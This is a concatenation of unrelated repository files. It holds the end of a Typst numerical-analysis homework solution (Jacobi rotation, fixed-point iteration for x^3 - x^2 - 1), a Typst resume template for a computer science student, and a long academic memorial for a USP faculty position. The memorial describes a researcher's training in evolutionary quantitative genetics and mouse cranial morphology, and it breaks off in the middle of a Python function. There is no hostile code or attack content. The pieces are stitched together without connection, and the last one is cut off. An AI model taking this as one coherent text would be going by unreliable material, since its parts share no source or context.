cot 2 phi = (a_(i i) - a_(j j)) / (2a_(i j)), abs(phi) leq pi / 4,
$
then $a_(i j)^((1)) = a_(j i)^((1)) = 1/2 (a_(j j) - a_(i i)) sin 2 phi + (a_(i i) - a_(j j)) / (2 cot 2 phi) (cos^2 phi - sin^2 phi) = 1/2 (a_(j j) - a_(i i)) sin 2 phi + 1/2 (a_(i i) - a_(j j)) (cos 2 phi) / (cot 2 phi) = 0,
$
From $d = cot 2 phi$, we have $1/d = (2 tan phi) / (1 - tan^2 phi) arrow.double tan phi = -d + text("sign")(d) sqrt(1 + d^2)$ (taking the root with $abs(phi) leq pi\/4$), so $t = tan phi$.
$
a_(i i)^((1)) &= a_(i i) cos^2 phi + a_(j j) sin^2 phi + 2 a_(i j) cos phi sin phi \
&= a_(i i) - (a_(i i) - a_(j j)) sin^2 phi + a_(i j) sin 2 phi \
&= a_(i i) - 2 cot 2 phi a_(i j) sin^2 phi + a_(i j) sin 2 phi \
&= a_(i i) + a_(i j) (sin 2 phi - 2 cot 2 phi (1 - cos 2 phi)/2 ) \
&= a_(i i) + a_(i j) (sin^2 2 phi - cos 2 phi + cos^2 2 phi ) / (sin 2 phi) \
&= a_(i i) + a_(i j) (2sin^2 phi)/(2 sin phi cos phi)
= a_(i i) + t a_(i j)\
a_(j j)^((1)) &= a_(i i) sin^2 phi + a_(j j) cos^2 phi - 2 a_(i j) cos phi sin phi \
&= a_(j j) + (a_(i i) - a_(j j)) sin^2 phi - a_(i j) sin 2 phi
= a_(j j) - t a_(i j)
$
$c = 1\/ sqrt(1 + t^2) = cos phi, s = c t = sin phi$, hence $
&a_(i l)^((1)) = a_(l i)^((1)) = c a_(i l) + s a_(j l), \
&a_(j l)^((1)) = a_(l j)^((1)) = -s a_(i l) + c a_(j l), l eq.not i, j\
$
]
#HWProb(name: "10-3")[
The equation $x^3 - x^2 - 1 = 0$ has a root near $x_0 = 1.5$. The equation can be rewritten in three different equivalent forms:
#set enum(numbering : "(1)")
+ $x = 1 + 1/x^2$, with iteration scheme $x_(n+1) = 1 + 1/x_n^2$;
+ $x^3 = 1 + x^2$, with iteration scheme $x_(n+1) = (1 + x_n^2)^(1/3)$;
+ $x^2 = 1/(x - 1)$, with iteration scheme $x_(n+1) = sqrt(1/(x_n - 1))$.

Determine the convergence of each iteration scheme at $x_0 = 1.5$ and estimate the rate of convergence. Choose one convergent scheme and compute the root near 1.5 to 4 significant digits, starting from $x_0 = 1.5$ and keeping 5 significant digits during the computation.
]
#solution[
#set enum(numbering: "(1)")
+ Convergent. $phi_1(x) = 1 + 1/x^2, phi_1'(x) = - 2/x^3$. Since $1.3^3 = 2.197 > 2$, we have $abs(phi_1'(x)) leq (2/1.3^3) < 1$ for $x in [1.3, 1.7]$, so $phi_1$ is a contraction on this interval and the iteration converges.
+ Convergent. $phi_2(x) = (1+x^2)^(1/3), phi_2'(x) = 2/3 x (1+x^2)^(-2/3)$, plotted below: #figure(image("2.png", width: 50%)) On $[1, 2]$ we have $abs(phi_2'(x)) < 0.46 < 1$, so $phi_2$ is a contraction and the iteration converges.
+ Divergent. $phi_3(x) = sqrt(1 / (x - 1)), phi_3'(x) = -1/2 (x-1)^(-3/2)$, plotted below: #figure(
image("3.png", width: 50%),
) On the interval $[1.4, 1.6]$ we have $abs(phi_3'(x)) > 1$, so the iteration does not converge.

Since $abs(phi_2'(1.5)) = 0.46 < abs(phi_1'(1.5)) = 0.59$, iteration scheme (2) converges faster. Using the second scheme, the computed values are:
$
x_0 = 1.5, x_1 = 1.4812, x_2 = 1.4727, x_3 = 1.4688, x_4 = 1.4670, x_5 = 1.4662\
x_6 = 1.4659, x_7 = 1.4657, x_8 = 1.4656, x_9 = 1.4656
$
The numerical solution is $x^* = 1.466$ (to four significant digits).
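// Illustrative check (added; not part of the original assignment): the
// fixed-point iteration for scheme (2) can be reproduced directly with
// Typst's scripting layer.
#let phi2 = x => calc.pow(1 + x * x, 1 / 3)
#let iterate(x0, n) = {
  let x = x0
  for _ in range(n) { x = phi2(x) }
  x
}
// iterate(1.5, 9) evaluates to approximately 1.4656, matching x^* above.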
] |
|
https://github.com/pm3512/resume | https://raw.githubusercontent.com/pm3512/resume/main/Alexander_Obolenskiy_resume.typ | typst | #let useAddress = false
#show heading: set text(font: "Linux Biolinum")
#show link: underline
#set text(size: 11.7pt)
#set page(
margin: (x: 0.9cm, y: 1.3cm),
)
// text with an icon and link (used in header)
#let iconText(icon, text, dest, dy, imageSize) = {
box(move(dy: dy, image(
width: imageSize,
icon,
)))
h(0.3em)
if dest != "" [#link(dest)[#text]] else [#text]
h(1em)
}
#set par(justify: true)
#let chiline() = {v(-3pt); line(length: 100%); v(-5pt)}
#let dashedline() = {v(-3pt); line(length: 100%, stroke: (dash: "dashed", thickness: 0.1mm)); v(-5pt)}
// header
#align(center)[
= <NAME>
#iconText("icons/email.png", "<EMAIL>", "mailto:<EMAIL>", 0.2em, 1em)
#iconText("icons/linkedin.png", "linkedin.com/in/alexander-obolenskiy", "https://www.linkedin.com/in/alexander-obolenskiy/", 0.15em, 1em)
#iconText("icons/phone.png", "878-999-6928", "", 0.2em, 1em)
#iconText("icons/github.png", "github.com/pm3512", "https://github.com/pm3512", 0.2em, 1.2em)
#iconText("icons/googlescholar.svg", "Google Scholar", "https://scholar.google.com/citations?&user=8ew3do4AAAAJ", 0.2em, 1em)
#if useAddress [
#box([/*TODO update address*/])
]
]
== Education
#chiline()
*Carnegie Mellon University*, School of Computer Science #h(1fr) Expected graduation: December 2024 \
BS in Computer Science with concentration in Machine Learning. \
*GPA*: 3.96, Dean's List: Fall 2021 -- Present. \
*Coursework*: Software Engineering (17-313), Operating Systems (15-410), Computer Systems (15-213), Distributed Systems (15-440), Algorithms & Data Structures (15-210), Program Analysis (17-355), Intro to Machine Learning (PhD, 10-701), Deep Learning (10-417), Generative AI (10-423).
== Experience
#chiline()
*Software Engineering Intern*, Jane Street #h(1fr) May-August 2024
- Optimized an internal routing application to achieve an 80\% speedup.
- Developed a compiler frontend for a domain-specific language.
#dashedline()
*Software Engineering Intern*, InterSystems #h(1fr) Summer 2022, Summer 2023 \
Summer 2023 \
- Designed and developed a dashboard for a version control application using Angular and SQL.
- Effectively communicated with stakeholders to obtain specifications and feedback.
- Helped identify 3000+ problems in the usage of the application and drive action to fix them.
- After finishing the project early, fixed multiple bugs within the application.
Summer 2022 \
- Implemented automatic end-to-end testing for a product evaluation tool using Cypress.
- Integrated end-to-end testing into the Jenkins CI pipeline.
- Authored documentation and conducted live demos to promote further adoption of the tool.
#dashedline()
*Software Developer & Project Lead*, ScottyLabs #h(1fr) September 2021 -- February 2024 \
- Developed and maintained the registration and judging systems for TartanHacks, Pittsburgh's largest hackathon.
- Leveraged TypeScript, Next.js, React, Prisma and MongoDB to ensure a smooth experience for 350+ participants.
- As a project lead for the registration system, chose the direction of the project and mentored new members.
#dashedline()
*Software Engineering Intern*, CMU CS Academy #h(1fr) January -- May 2023 \
- Developed features and resolved bugs in a web-based platform for teaching computer science.
- Used JavaScript, React and Django to implement features such as media preview, plagiarism detection and exam mode.
- Advocated for and facilitated the adoption of TypeScript in the project.
#dashedline()
*Research Assistant*, CMU Language Technologies Institute #h(1fr) May 2022 -- December 2023 \
- Worked on research in Multimodal and Meta-learning.
- Results published in ICLR 2024.
== Skills
#chiline()
*Languages*: JavaScript/TypeScript, HTML/CSS, Python, SQL, OCaml, C, C++, Go, Bash, Java\
*Frameworks*: React, Next.js, Tailwind, Angular, Django, Express, Prisma, Jest, Cypress, PyTorch, TensorFlow, JAX\
*Tools*: Linux, MongoDB, MySQL, Git, Perforce, Jenkins, Vim, LaTeX, Typst\
*Soft Skills*: Teamwork, communication, adaptability, work ethic, attention to detail |
|
https://github.com/diogro/memorial | https://raw.githubusercontent.com/diogro/memorial/master/IB-USP-2024/memorial.typ | typst | #align(left + horizon, text(35pt, font: "Skolar Sans PE TEST", weight: "extrabold")[
*Memorial de Atividades, Títulos e Publicações*
])
#align(left, text(20pt, font: "Skolar Sans PE TEST", weight: "bold")[
*Concurso de Professor Doutor em RDIDP no Departamento de Botânica*
])
#align(left, text(15pt, font: "Skolar Sans PE TEST", weight: "bold")[
#v(15pt)
Instituto de Biociências
#v(0.65pt)
Universidade de São Paulo
#v(15pt)
<NAME>
<EMAIL>
])
#set text(
font: "Skolar PE TEST",
size: 12pt,
lang: "por",
region: "br"
)
#set page(
paper: "a4",
header:[
#set text(9pt, font: "Skolar PE TEST")
Memorial
#h(1fr) <NAME>
],
numbering: "1",
)
#show outline.entry.where(
level: 1
): it => {
v(11pt, weak: true)
strong(it)
}
#pagebreak()
#v(10pt)
#outline(fill: none,
indent: 2em,
  title: "Contents",
depth: 2)
#v(100pt)
#align(center, text(13pt)[
  *Introduction*
])
I present this memorial in response to Call 038-2023 (Edital 038-2023), published by the Rectory of the Universidade de São Paulo in the Diário Oficial da União of October 10, 2023, concerning the examination for the position of Professor Doutor in the area of "Systems Biology – Integrative and Predictive Biology," under the RDIDP regime, in the Department of Botany of the Instituto de Biociências of the Universidade de São Paulo.
In what follows, I present my academic trajectory, including my teaching and research experience. I highlight some of the projects I have worked on and how each part of this trajectory contributed to my formation as a researcher. At the end, I present my full curriculum and supporting documents for the degrees, courses, conference presentations, and publications described in the text.
#pagebreak()
#show par: set block(spacing: 1em)
#set par(
leading: 1em,
first-line-indent: 1em,
justify: true
)
#show heading: it => {
block[#it.body]
v(0.3em)
}
= Undergraduate Studies
== Molecular Sciences
My path did not begin in biology, but in the Molecular Sciences Course (Curso de Ciências Moleculares, CCM), a program designed to train researchers in the exact and biological sciences. It was my mother, Prof. <NAME>, a retired researcher at the Institute of Biomedical Sciences (ICB) of USP, who first told me about this course. She knew of it because a CCM student had sought her out and was doing undergraduate research in her laboratory. My mother's profession strongly influenced my interest in scientific research; I always enjoyed hearing about her daily work and visited her laboratory a few times. I was also drawn to the freedom she had to study, and I saw the pleasure with which she devoted herself to university teaching. I became interested in the CCM precisely because it would give me the opportunity to move across several areas that interested me, such as biology, physics, and mathematics, since I was interested in research in general but had not yet settled on a specific field. Although it is a four-year bachelor's program, the CCM has no direct admission through the entrance exam (vestibular); selection is done through an exam in the middle of the academic year, open to students from any USP undergraduate program. I therefore entered the Biological Sciences program at the Institute of Biosciences (IB) of USP intending to join the CCM as soon as possible. I chose biology because it was a program I would be happy to complete if I were not approved in the CCM selection exam.
During my first semester in biology I discovered that the father of one of my best friends from high school, with whom I already had a good relationship, was one of the founders and first professors of the CCM, Prof. <NAME> of the Institute of Chemistry. I ran into Prof. Hernan at his daughter's birthday party, and he strongly encouraged me to switch programs, as he believed I had the profile of a CCM student. Despite this encouragement, and despite passing the admission exam, during my time at the IB I came to identify with biology and considered giving up the change. It was a CCM student I met at the time, who is now a good friend, who convinced me to enroll. So, after only six months in the biology program, I moved to the molecular sciences program, and today I see that this was an extremely wise decision.
The CCM is special in its structure. In the first two years, the basic cycle, students take a demanding set of required courses that provides a solid foundation in physics, chemistry, mathematics, computing, and basic aspects of biology, such as cell and molecular biology and biochemistry. The last two years, the advanced cycle, offer complete academic freedom. Each student builds, together with their advisor, a curriculum tailored to the demands of the area in which they have chosen to specialize, and may take any course at the university without restriction. The academic rigor of the basic cycle and the freedom of the advanced cycle make each CCM cohort unique, formed by people with diverse specialties and complementary skills and interests who, at the same time, share a common language established in the basic cycle. In the CCM I lived alongside everyone from particle physicists to historians of science, an environment that fosters camaraderie and mutual help in a challenging and intense learning process. During the course I learned a great deal not only from the professors but also from my classmates, and I like to think that I also contributed to the learning of the rest of the cohort. The course demanded much from all of us and was a crucial formative process in shaping how I deal with the pressures of academic life. The basic cycle of the molecular sciences program is so demanding that it made the demands of the advanced cycle and of the biology degree (once I decided to finish that program as well) seem relatively mild. Thanks to this, I was able to complete the second half of the CCM and the rest of the biology program with enough peace of mind to devote myself to research activities as well.
My research experience began during the advanced cycle of the CCM, in the laboratory of Prof. Vera <NAME>, in the Department of General Physics of the Institute of Physics (IF) at USP. Prof. Vera leads a laboratory that integrates the theory of statistical mechanics, a generalization of thermodynamics, with biological processes at the cellular level. My interest in the questions of biology and the methods of physics drew me to this line of research, and I began an undergraduate research project exploring computational models for the study of phase transitions in biological membranes. The idea of the project was to recover, in computer simulations, thermodynamic behaviors observed in experiments with cell membranes, and thereby understand which processes are important in determining membrane behavior. For this, we used simple models of the interactions between the phospholipids that make up cell membranes. This project was my first contact with the use of simulations in research, and I presented preliminary results at a small conference in 2007, the _V Brazilian Meeting on Simulational Physics_ in Ouro Preto.
Another important influence on my academic career was Prof. <NAME>, who was married to my mother. My interest in cell membranes, the motivating system of my undergraduate research project, together with the family connection, led me to take, and to serve for several years as a teaching assistant in, the membrane physiology course that Prof. Cassola taught for the USP Medical School. Daily contact with Prof. Cassola, at home and at the university, instilled in me a deep respect for scientific debate and for the practice of science. His lectures were very rich and covered seemingly disparate topics, always tied together by a cohesive narrative. Taking part in his course was very important to me, as it showed me how even a central topic in biology carries a series of connections to other areas of knowledge, such as physics or even the philosophy of science. My work in his course catalyzed a habit of always being involved in teaching assistantships in various courses, even those not directly related to my research. When I entered the biology program in 2003, Cassola gave me the book _What is life?_#footnote[<NAME>., & <NAME>. (1944). What is life?: With mind and matter and autobiographical sketches. Cambridge University Press (reissued in 1992).], in which the physicist <NAME>, one of the leading names of early twentieth-century quantum mechanics, discusses the fundamental aspects of living beings and the properties that a molecule responsible for genetic inheritance should have. Today I find it interesting to think how my own trajectory echoed this theme, starting from physics and returning to biology. Perhaps my contact with this work of Schrödinger helped me see the connection between these areas of knowledge and the possibilities that the interaction between them can generate.
Work at the Institute of Physics also put me in contact with another research group in the same department, that of Profs. <NAME>, of the IF, and <NAME>, of the Institute of Mathematics and Statistics, where some of my undergraduate classmates were doing their research projects. This group, on the statistical mechanics of information processing, was surprisingly multidisciplinary and applied modern methods from physics and statistics to problems from economics, sociology, biology, and other areas of physics. The group's weekly meetings were intellectually stimulating and ended up influencing me even more than my own project. Even during my master's I kept attending these meetings. There I presented previews of qualifying exams and talks, and the group always brought me new ideas and a viewpoint external to biology, which enriched my theoretical and methodological perspective on the problems I tackled during my training. In particular, it was in this group that I was introduced to Bayesian methods, which would become one of the main focuses of study and practice in my research. This early contact with Bayesian statistics was a differentiating factor in my academic trajectory, since the topic is rarely presented in introductory courses and is traditionally covered only after exposure to more traditional methods. I believe that being introduced to it when I still carried fewer concepts and preconceptions from other methodologies contributed to my mastery of these methods.
== Biological Sciences
Having graduated from molecular sciences and finished my project with Prof. Vera Henriques, I realized that, despite my interest in the methods used in physics, I felt more attracted to the problems raised by biology. I therefore decided to return to the biology program and apply the techniques I had learned in physics to problems with more biological motivations. Back in the biology program, I spoke with several professors at the Institute of Biosciences and chose to join the group of Prof. <NAME> at the Laboratory of Mammalian Evolution (Laboratório de Evolução de Mamíferos, LEM). I remember that when we first talked, through good friends who studied in his laboratory, Gabriel told me the laboratory was very full and it would be hard for me to join at that moment. However, upon learning that I was coming from physics and knew how to program, he immediately suggested we schedule a conversation. It was a stroke of luck, for at that moment we began a fruitful and successful collaboration.
During my undergraduate research at the LEM, I worked on computational methods to produce covariance matrix estimates that are more robust to sampling problems and can be used to reconstruct the evolutionary history of complex phenotypes more accurately #footnote[This short summary of my first paper illustrates how my move toward more biological problems was, in fact, quite gradual. It was hard to convince my undergraduate research committee that this project was, indeed, biology.
]. This project resulted in the first article in which I actively participated in the research, writing, and publication @Marroig2012-jd. It was a long editorial process until publication #footnote[It was in this work that I learned not to put dates in manuscript file names. I had to change the year in the file name twice.]. After a rejection accompanied by good reviews at a prestigious journal, we prepared a heavily modified and expanded second version, which was accepted, including an additional section by Dr. <NAME>, who was a master's student at the time. It was my first project with Guilherme, and later we would work together on other computational methods applied to evolution. In retrospect, I knew far less statistics then than I believed, and I would certainly write a different manuscript today, but the methods and conclusions remain relevant and robust.
= Master's Degree
Upon completing the biology degree, I had no doubt that evolution was the research area that attracted me most. Research in population genetics and evolutionary biology relies on well-established mathematical models, which would give me the opportunity to use the mathematical and computational techniques I had learned in physics and in the molecular sciences program. Moreover, it is a field with many open questions, one that provides the fundamental mechanisms for understanding biological processes at all levels of organization.
With this in mind, over the course of my undergraduate research Gabriel and I developed a research project for my master's based entirely on simulations, one that would be relevant to the rest of the LEM's research lines. My goal with this project was to bring to the laboratory something that in physics is sometimes called Landau's triangle#footnote[The name refers to the physicist <NAME>, who always uses the triangle in his presentations. He is known for the Wang–Landau algorithm, a Monte Carlo method widely used in statistical mechanics. It is an interesting algorithm that uses a counterintuitive problem-solving technique: when confronted with a complicated problem, look for a way to complicate it even further, which eventually leads to a solution.]: an equilateral triangle whose vertices are the complementary methodologies of #strong[experiment], #strong[theory], and #strong[simulation]. The triangle illustrates how these three elements can act in synergy to drive scientific progress.
A fundamental part of the research at the Laboratory of Mammalian Evolution (LEM) was cataloging the patterns of genetic association among phenotypic traits in several groups of mammals, and relating this association to the morphological diversification of the groups. In this context, there is a well-established theoretical expectation that genetic associations should affect the short-term evolutionary response, and there are two relevant empirical results: (1) patterns of genetic association are related to the function performed by the different traits; (2) association patterns are quite stable in mammals, being shared by several evolutionarily distant groups. Thinking of Landau's triangle, we asked whether we could understand, using a computational model, how these associations among several traits were established and how they were maintained. To this end, I developed an individual-based model that included a variable genetic architecture capable of responding to evolutionary processes. Using this model, we showed that directional selection is a powerful factor in establishing genetic associations, and that stabilizing selection was necessary to maintain the patterns over the long term. Our model was the first capable of simulating complex evolutionary scenarios across multiple traits using a variable genetic basis. This work was my first article as first author and was published in #cite(<Melo2015-bk>, form: "prose").
During my master's I also devoted myself to deepening my study of Bayesian statistics, reading some of the textbooks that now guide my research practice, in particular _Probability Theory_#footnote[<NAME>. (1996). Probability theory: the logic of science. St. Louis, MO: Washington University.], by <NAME>, and _Bayesian Data Analysis_#footnote[<NAME>., <NAME>., <NAME>., <NAME>., <NAME>., & <NAME>. (2013). Bayesian data analysis. CRC press.], by <NAME> and collaborators. This prolonged study throughout my master's, combined with my contact with Prof. Caticha's group, gave me the theoretical foundation to develop statistical models customized for problems in several areas of biology, a skill that yielded fruitful collaborations during my doctorate. I list some of the articles I published as a collaborator, in which I was primarily responsible for the data analysis or for developing a model tailored to a specific problem: @Wolf2015-es @Hubbe2016-za @Costa2016-mv @Fukimoto2020-oy.
It was also during my master's that my relationship with the R programming language began; it became my main working tool. In 2011 I took the R course offered by Profs. <NAME> and <NAME> of the Department of Ecology at IB-USP, and from then on I used this language almost exclusively for my analyses and projects. I have been a teaching assistant for the R course nearly every year since. Using this powerful tool, at the end of my master's I began systematizing the analysis routines used at the LEM, as I describe below.
== Between master's and doctorate
After my master's, from late 2012 through all of 2013, I decided to devote myself fully to this effort of standardizing and implementing the LEM's analysis routines in R, aiming to ease the adoption of the laboratory's methods by future students and by the scientific community at large. This work was funded by a FAPESP technical training fellowship. In collaboration with Guilherme, mentioned earlier, and starting from the routines he had used in his master's, I reimplemented the laboratory's workflow in R, creating a set of modular, efficient routines that could be easily disseminated in the scientific community. The result was the EvolQG package#footnote[#link("https://cran.r-project.org/web/packages/evolqg/index.html")], which centralizes a good part of the analyses in quantitative genetics applied to evolution and is described in #cite(<Melo2015-kf>, form: "prose"). It was during this period that I truly understood how to manage a large R project and went through the process of creating a set of open tools for use by other researchers. Today the package has more than 46,000 downloads and is widely used by the quantitative genetics community.
Besides the work on the R routines, during this period I became involved in an experimental project that Prof. Gabriel had been planning for some time, in collaboration with Prof. <NAME> of the University of Bath in the United Kingdom. The idea was to explore the genetic architecture of complex phenotypes using an experimental cross between mouse lines that had been selected for changes in their growth curves. The project was large and ambitious, involving a long period of raising a new animal colony. The plan was to start from six homozygous founder lines and create a colony that would be maintained for several generations of crosses, keeping effective population sizes above 400 individuals per generation. In the sixth and final generation, the F6, we would raise a population of more than 1,600 individuals, divided into 160 families, to be extensively phenotyped for several traits, such as growth curve, body composition, and cranial morphology, among others. In addition, all animals of the F5 and F6 generations would be genotyped using a microarray designed specifically for this colony. With this rich database we would be at the frontier of experimental investigation into the evolution of genetic effects on complex traits, and could directly relate the evolutionary process to the genetic architecture of these traits. This project interested me greatly, mainly because it would give me the opportunity to evaluate experimentally the predictions made by my simulation model during my master's. It was a chance to study how genetic architecture interacts with an artificial selection event.
= Doctorate
My doctorate was embedded in this larger project in collaboration with Prof. Jason. Gabriel and I were responsible for analyzing the genetic architecture of the multivariate phenotypes measured in the experiment, with the main goal of studying pleiotropic effects (when one locus affects the variation of more than one trait simultaneously). The problem was that, given the scope of the project, I already knew I would spend at least three years without any results, and that even after the first results a long process of data collection would still be needed#footnote[In practice, data collection was only finished in 2020, more than a year after the end of my doctorate.]. Moreover, much of the experiment and data collection would take place at the University of Bath, where I could spend at most a few months at a time. This distance from the project's day-to-day work and the delay before seeing results were important challenges, which forced me to organize my time intelligently so I could meet the demands of the main project and, at the same time, develop alternative projects that would allow me to finish the doctorate within five years. As a result, my thesis had an unusual structure, since each chapter uses a different data set and different methods, while being connected by a common theme: the study of genetic covariation.
Right at the beginning of my doctorate, in 2014, I visited Prof. Jason's laboratory for three months. It was a rich period in which I took part in the early establishment of the mouse colony, working in collaboration with the postdoctoral researcher who would be chiefly responsible for raising the animals, <NAME>. During this period I collaborated with Prof. Jason on a side project in which we developed a Bayesian model to analyze data from an experiment with the amoeba _Dictyostelium discoideum_, a unicellular eukaryote that is a model species for altruistic cooperation. We explored a case of coexistence between _Dictyostelium_ lineages, in which "selfish" lineages, which do not display altruistic behavior, coexisted with "cooperator" lineages, which do. This situation poses a theoretical challenge, since, according to theory, a selfish lineage, by exploiting the altruism of a cooperator lineage without incurring the costs of altruistic behavior, should competitively exclude the cooperator. This exclusion does not happen, and we showed that coexistence was possible due to trade-offs between different phases of the amoebae's life cycle. Considering all fitness components, across all phases of the life cycle and not only during the interaction between lineages, both the selfish and the cooperator lineages had similar fitness. An example of quantitative genetics applied to an unusual field, this work was published in #cite(<Wolf2015-es>, form: "prose") and was well received, even being recommended by the _Faculty of 1000_#footnote[#link("https://f1000.com/prime/725409260").].
I would return to the University of Bath a second time, for five months in 2016, now in time to take part in the final stages of the mouse colony. This time I participated actively in collecting body composition data from the F6 animals, and I became the main person responsible for designing the microarray later used to genotype all animals of the F5 and F6 generations. It was my first contact with genomic data and bioinformatics tools, and again a time of great learning. During this second visit, Jason and I devoted ourselves to developing methods for analyzing the genetic architecture of complex traits, in the same style as those that would be needed once we had access to the data from our experiment. For this we used an old data set from the laboratory of Prof. <NAME>, which had a structure similar to the data that would come from our experiment. With these data, we explored new genetic mapping techniques designed to measure the pattern of genetic effects on several traits simultaneously and relate them to the evolutionary history of the population under study. Once again my knowledge of Bayesian statistics was fundamental, and I designed the entire analysis strategy, counting on the precious help of Prof. Jason. This work resulted in a manuscript that became one of my thesis chapters and was published in #cite(<Melo2019-le>, form: "prose").
Besides these visits to Bath, while in Brazil, away from the mouse experiment, I sought to get involved in projects in collaboration with the other members of the LEM. In 2015, I began a project with a LEM master's student, <NAME>, who now holds a doctorate from the University of Texas at San Antonio. At the time, Anna was involved in a large master's project and had a data set, collected during her undergraduate research, that had not been carefully explored. These were cranial morphology data from five experimental mouse populations derived from the same ancestral population: two populations selected for increased weight, two selected for decreased weight, and one control. Working with Anna, I realized these data would be ideal for studying the evolution of cranial covariation under directional selection, again an experimental model related to my master's simulations. In a joint effort, Anna and I analyzed these data from the perspective of phenotypic covariation and found a clear pattern of change in the organization of variation in the selected lines, compatible with the predictions of my master's work. This work is also one of my thesis chapters and was published in #cite(<Penna2017-if>, form: "prose"), with Anna and me as co-first authors.
Besides the collaboration with Anna, in 2015 I also had the privilege, together with Prof. Gabriel, Prof. <NAME>, and a former LEM master's student, Dr. <NAME>, now a professor at the University of Florida, of writing a review for one of the _Annual Reviews_ journals. Gabriel had been invited to write an article on modularity and invited the three of us to participate. Prof. Cheverud was responsible for a historical introduction to the concept of modularity, while Arthur and I led the writing of most of the manuscript and the production of figures, and Gabriel contributed important ideas concerning the macroevolutionary consequences of the theory reviewed in the manuscript. Arthur, Gabriel, and I wrote the first version of the manuscript in little more than a month of intense but very rewarding work. We managed to present a didactic summary of the application of modularity theory at several levels of biological organization and, using Gabriel's ideas, to propose a larger role for modularity and genetic covariation in macroevolutionary diversification. This work was another chapter of my thesis #cite(<Melo2016-yw>, form: "prose").
Finally, in 2017, after a series of delays due to the technical difficulties of raising such a large mouse colony, we began to get the first results of the work with Prof. Jason. I used the ideas we had developed during my second visit to Bath to analyze the data available at that moment, and produced a set of preliminary results relating the pattern of genetic effects on the growth-curve phenotypes of our mice to the evolutionary history of the founder lines. Using a simulation model more complex than the one from my master's, I was also able to elucidate how the pattern of selection in the founder lines shaped the genetic effects we observed in our F6 generation. This work was presented at the International Evolution Congress in 2018 and became one of my thesis chapters. That last chapter was not published, in part because, while I was writing it, in September 2018, my first son, Tomás, was born, one month earlier than planned!
All these different research lines and datasets came together in a cohesive thesis, which explored in different ways the problem of the evolution of genetic associations and their evolutionary consequences. The need to be involved in several independent projects forced me to conceive a single unifying thread across the studies and, by developing techniques suited to each of the questions they addressed, I was able to build an original and diverse research program. While Gabriel's laboratory had always excelled at describing and understanding patterns of genetic covariation in mammals at a macroevolutionary scale, my work extended this research line in a more genetic direction, bringing in new techniques and placing the complexity of genetic architecture at the center of the discussion. Evolutionary processes shape genetic architecture, and genetic architecture affects how populations respond to evolutionary processes, in a complex feedback loop. Exploring this interaction became the core of my research.
= Postdoctoral research
== Laboratório de Evolução de Mamíferos
When we were discussing my PhD project, Gabriel believed I should measure high-resolution cranial phenotypes in the mice of our experimental population. Cranial data, combined with the genotypes, make it possible to elucidate the genetic architecture responsible for cranial variation and to understand how a complex phenotype responds to microevolutionary processes. This would be a rich dataset, providing the substrate for a series of projects that could extend the LEM's research lines in original ways. This was, however, a point on which we disagreed, not because I lacked interest in the cranial data, but because I considered that we would not have enough time to complete the measurements during the PhD. I therefore decided not to include this undertaking in any of the projects submitted during that period, preferring to concentrate on the phenotypes that could be collected alongside the development of the colony: growth rates and body composition. I did so confident that these data would be sufficient for the PhD work, and that obtaining the complete cranial data in so little time would be very difficult given the scale of the project. Nevertheless, already planning a continuation of the project, in the last two years of my PhD I began digitizing the skulls of the F6 animals in the high-resolution micro-CT scanner of the Department of Genetics and Evolutionary Biology.
In retrospect, postponing the start of a project based on the cranial data was the right choice. Scanning the animals was a laborious process full of setbacks. The animals arrived in Brazil at the beginning of 2017, after a lengthy process to ensure they would clear customs without incident. At the time, I was co-advising a fantastic undergraduate student, <NAME>, who helped me greatly with the process of importing the animals from the United Kingdom. Beatriz and I spent weeks processing the roughly 2,400 animals preserved in alcohol, cataloguing them and storing them in containers separated by experimental generation. After that, it took us a few months to learn together the best way to prepare and scan the animals, respecting the size limits of the specimens and the available time on the department's micro-CT scanner. Everything went reasonably well until June 2017 when, after about 250 animals had been scanned, the micro-CT scanner broke down and remained out of service for more than six months. During that time, Beatriz, Gabriel, and I wrote an undergraduate research project for her, but after two attempts we failed to obtain FAPESP funding, owing to issues in the student's transcript from early in her degree, which in no way reflected the quality of the researcher she will certainly become. After that, Beatriz grew tired of waiting for the scanner and a fellowship and left the laboratory, but not before helping me train my other undergraduate student, <NAME>, in the mouse preparation and scanning protocol. At the beginning of 2018, the micro-CT scanner finally came back into operation and, taking advantage of the empty university during the holidays, I managed to scan more than 1,200 animals in two months, practically on my own.
After this effort, with demand for the micro-CT scanner increasing, we slowed the pace of digitization, and over the course of 2018 Amanda and I finished scanning all the animals from generations F5 and F6, plus some of the founders, for a total of more than 2,200 scanned animals#footnote[As far as I could ascertain, the largest sample of cranial morphology ever collected in a single population.]. This entire project, and especially the process of obtaining the cranial phenotypes, taught me to plan for the short and the long term, to write resilient projects, and to deal with the setbacks and delays common to virtually every project of this scale.
I include this account in this section because the work with the skulls became the project of my first postdoc, whose goal was to use our colony to investigate how genetic architecture relates to the pattern of genetic associations among skull traits. As I mentioned earlier, the cranial data make it possible to integrate this project with the other results produced at the LEM over the last decade, and to explore experimentally how genetic associations are established and evolve in a complex phenotype whose macroevolutionary history has been extensively studied. In 2020, three and a half years after the animals arrived in Brazil, we finally completed the collection of cranial phenotypes for all scanned animals, making it possible to relate them to the genotypes in order to identify the loci responsible for covariation in the skull.
The first study to use the skull dataset was Amanda's undergraduate research project, which I supervised during 2019, when only the F6 generation had been measured. Amanda investigated the link between the maximum growth rate observed in the F6 animals and their cranial integration#footnote[A measure of the average intensity of the associations among a set of phenotypic traits.], two variables that, when measured across different mammalian species, are positively correlated at a macroevolutionary scale @Porto2013-dc. The goal of Amanda's project was to test whether this association was driven by a mechanistic link between the two variables and could therefore be observed within a single population with variation in growth rates. Our population was ideal for this purpose, as it had been founded by lines with large, artificially selected differences in growth rates, and therefore showed substantial variation in growth in the F6 generation. This research revisited one of the first questions Gabriel and I had posed when starting the joint project with Prof. <NAME>. Surprisingly, the relationship between growth rate and integration was the reverse of that observed across species: animals with higher growth rates turned out to be less integrated than animals with lower growth rates. Although it did not confirm our initial hypothesis, this result reveals a link between these two variables that we still intend to explore further, with the aim of understanding its consequences for the short-term evolution of cranial covariation. Supervising Amanda involved an extended study of statistics, and by the end she was able to understand and interpret the Bayesian analysis model we built together. Although this is a rather specific problem, the techniques we used are broadly applicable and can be used to analyze many kinds of experimental data.
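As a methodological aside, the notion of integration mentioned above can be made concrete. One common summary in the morphometrics literature (used here purely as an illustration; it is not necessarily the exact statistic used in this project) is the relative eigenvalue variance of the trait correlation matrix, which is 0 when traits vary independently and 1 when all variation lies along a single axis:

```python
import numpy as np

def integration(traits: np.ndarray) -> float:
    """Relative eigenvalue variance of the correlation matrix of a
    (n_individuals x n_traits) data matrix. Returns a value in [0, 1]:
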